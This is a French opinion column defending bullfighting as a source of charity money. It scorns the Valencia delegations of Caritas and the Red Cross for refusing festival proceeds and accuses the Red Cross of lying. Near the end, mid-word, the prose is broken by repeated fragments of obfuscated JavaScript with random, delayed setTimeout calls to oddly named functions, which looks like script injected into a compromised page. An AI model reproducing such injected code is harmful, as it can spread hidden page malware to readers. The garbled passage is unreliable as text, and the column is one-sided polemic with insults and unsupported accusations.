L’ARGENT LE PLUS HONNÊTE

Je n’ai jamais aimé la charité. Car ce concept suppose l’existence d’une indigence que le gouvernement en place n’a pas sue ou n’a pas pu éviter. Il suppose aussi une inégalité sociale qui favorise le côté ostentatoire du donateur, et d’une certaine manière un sentiment d’humiliation pour le bénéficiaire. Je préfère ces greniers que l’ancienne Rome mettait à disposition du peuple pour se fournir abondamment en blé que ces maisons de charité. Cependant, si je m’incline pour une justice sociale qui éliminerait les donations et les palliatifs de la misère, devant la pénible réalité que doivent supporter un nombre chaque fois plus élevé de nos semblables, je valorise le côté humain et protecteur de ces organisations à but non lucratif destiné à ceux qui en ont le plus besoin.

À la provision de fonds pour le bénéfice de tous a contribué la tauromachie de manière altruiste depuis ses débuts pour le maintien des premiers hôpitaux de charité en Espagne. Personne n’a jamais mis en doute la générosité des participants et des organisateurs et il y a toujours existe de la part des organismes bénéficiaires de la reconnaissance et du remerciement.

Cependant, on dirait que les temps ont changé. Depuis qu’est arrivé le fanatisme animalier et avec lui la haine profonde de l’être humain. De la même manière que nos gouvernants ont trahi le peuple en privilégiant le paiement de la dette au détriment des besoins sociaux, l’anti-corrida privilégie le bien-être de l’animal à celui des hommes. C’est presque arrivé à Cordoue et ce le fut à Requena, avec les festivals organisés au bénéfice de Caritas et de la Croix Rouge.

Ces personnes écervelées qui dirigent les délégations de ces entités à Valence, en privilégiant les bêtes aux familles dans le besoin qu’ils prétendent secourir –qui, bien entendu, ne sont ni les siennes ni celles de leurs proches-, déclinent allègrement les fonds qu’ils pourraient récolter du spectacle taurin en refusant tout don provenant de ce qu’ils considèrent comme de la « maltraitance animale ».

L’expression « l’argent n’a pas d’odeur » ne semble plus leur convenir, ou tout du moins concernant la tauromachie, car je n’imagine pas qu’ils vont faire des investigations pour savoir si l’argent qu’ils reçoivent provient de la drogue, de la prostitution, du blanchiment de capitaux ou simplement du business des granges avicoles ou des élevages intensifs où la volaille et les bovins souffrent tassés les uns sur les autres une maltraitance bien pire que celle que pourraient imaginer leurs « sensibles » neurones.

Devant le tollé provoqué par semblable affront, les communiqués de ces deux entités les ont davantage mis en évidence. Surtout la Croix Rouge qui ment carrément en affirmant que durant les deux dernières décennies elle n’a participé à aucun spectacle taurin. Pour le démentir, il suffit de revenir au 12 octobre dernier et constater que la corrida de toros qui s’était déroulée à Séville était organisée au bénéfice de cet organisme, comme il est habituel saison après saison et depuis des décennies.

C’est une insulte à l’intelligence que ces béats de la défense animale soient en charge de ces postes et que leur direction ne les en chasse. Quant au festival il a bien eu lieu et logiquement son objectif caritatif a été maintenu et l’argent a été destiné au bénéfice de la maison de retraite de cette localité, dont les gestionnaires –les « Hermanitas de los Ancianos Desamparados » – au lieu de battre des bâtons dans les roues, ont remercié de tout cœur cet argent récolté fruit du travail des éleveurs et des toreros. Contrairement aux pinaillages de ces petits bourgeois philanthropes de pacotille, ils savent parfaitement que cet argent provient de la tauromachie, qu’ils en ont grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and besoin pour répondre à leurs nécessités, et que cet argent récolté est le plus honnête qui soit.

Les commentaires sont fermés.